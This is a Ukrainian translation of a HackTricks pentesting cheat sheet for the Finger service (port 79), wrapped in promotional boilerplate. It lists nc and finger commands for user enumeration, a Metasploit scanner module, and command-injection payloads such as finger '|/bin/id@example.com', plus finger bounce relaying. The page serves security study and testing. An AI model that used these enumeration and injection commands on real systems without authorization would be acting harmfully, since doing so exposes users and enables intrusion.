mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 12:43:23 +00:00
5.2 KiB
5.2 KiB
79 - Пентестинг Finger
Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!
Інші способи підтримки HackTricks:
- Якщо ви хочете побачити рекламу вашої компанії на HackTricks або завантажити HackTricks у форматі PDF, перевірте ПЛАНИ ПІДПИСКИ!
- Отримайте офіційний PEASS & HackTricks мерч
- Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами на Twitter 🐦 @carlospolopm.
- Поділіться своїми хакерськими трюками, надсилайте PR до HackTricks і HackTricks Cloud репозиторіїв на GitHub.
Основна інформація
Програма/сервіс Finger використовується для отримання деталей про користувачів комп'ютера. Зазвичай надана інформація включає логін користувача, повне ім'я, а також у деяких випадках додаткові деталі. Ці додаткові деталі можуть включати місце розташування офісу та номер телефону (якщо доступно), час, коли користувач увійшов у систему, період неактивності (час простою), останній раз, коли користувач переглядав пошту, а також вміст файлів плану та проекту користувача.
Порт за замовчуванням: 79
PORT STATE SERVICE
79/tcp open finger
Перелік
Отримання банера/Основне з'єднання
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
Перелік користувачів
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
Альтернативно, ви можете використовувати finger-user-enum від pentestmonkey, деякі приклади:
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
Nmap виконує скрипт для використання стандартних скриптів
Metasploit використовує більше трюків, ніж Nmap
use auxiliary/scanner/finger/finger_users
Shodan
port:79 КОРИСТУВАЧ
Виконання команд
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Finger Bounce
Використовуйте систему як реле для finger
finger user@host@victim
finger @internal@external
Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!
Інші способи підтримки HackTricks:
- Якщо ви хочете побачити свою компанію рекламовану на HackTricks або завантажити HackTricks у форматі PDF, перевірте ПЛАНИ ПІДПИСКИ!
- Отримайте офіційний PEASS & HackTricks мерч
- Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
- Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами на Twitter 🐦 @carlospolopm.
- Поділіться своїми хакерськими трюками, надсилайте PR до HackTricks і HackTricks Cloud репозиторіїв на GitHub.